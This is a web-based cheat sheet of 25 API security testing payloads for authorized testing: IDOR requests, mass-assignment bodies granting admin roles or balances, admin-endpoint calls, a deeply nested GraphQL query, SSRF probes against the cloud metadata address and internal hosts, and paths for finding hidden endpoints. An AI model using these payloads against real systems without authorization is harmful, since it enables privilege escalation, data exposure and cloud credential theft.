API security testing techniques covering BOLA/IDOR, mass assignment, broken function level auth, excessive data exposure, SSRF, and shadow APIs. (25 payloads)
GET /api/v1/users/2 HTTP/1.1GET /api/v1/users/1 HTTP/1.1POST /api/v1/messages
{"to": "other_user_id"}PUT /api/v1/accounts/other_id/settingsPATCH /api/v1/orders/ORDER_IDPOST /api/register
{"username":"x","password":"y","isAdmin":true}PATCH /api/users/me
{"role":"admin"}PUT /api/profile
{"email":"[email protected]","balance":999999}DELETE /api/v1/admin/users/123GET /api/v1/admin/reportsPUT /api/v1/users/123/roleGET /api/users/meInspect all API responses for fields not rendered in the UI — filter logic may hide data client-side only[{"query":"..."},{"query":"..."}]query { user { posts { comments { likes { user { posts { ... } } } } } } }Upload endpoint with no Content-Length checkPOST /api/fetch
{"url":"http://169.254.169.254/latest/meta-data/"}POST /api/webhook
{"callback":"http://internal-api/admin"}/api/swagger.json/api/openapi.json/api/graphqlOPTIONS /api/users/api/v2/Search JS bundle files for fetch() and axios() calls to find undocumented endpoint pathsIntercept mobile app traffic — mobile APIs often differ from web app endpointsLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 25 API Security payloads for testing API Security vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test, or open the GraphQL Injection generator to build customized API Security variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all API Security payloads are completely free, with no account required. Everything runs in your browser.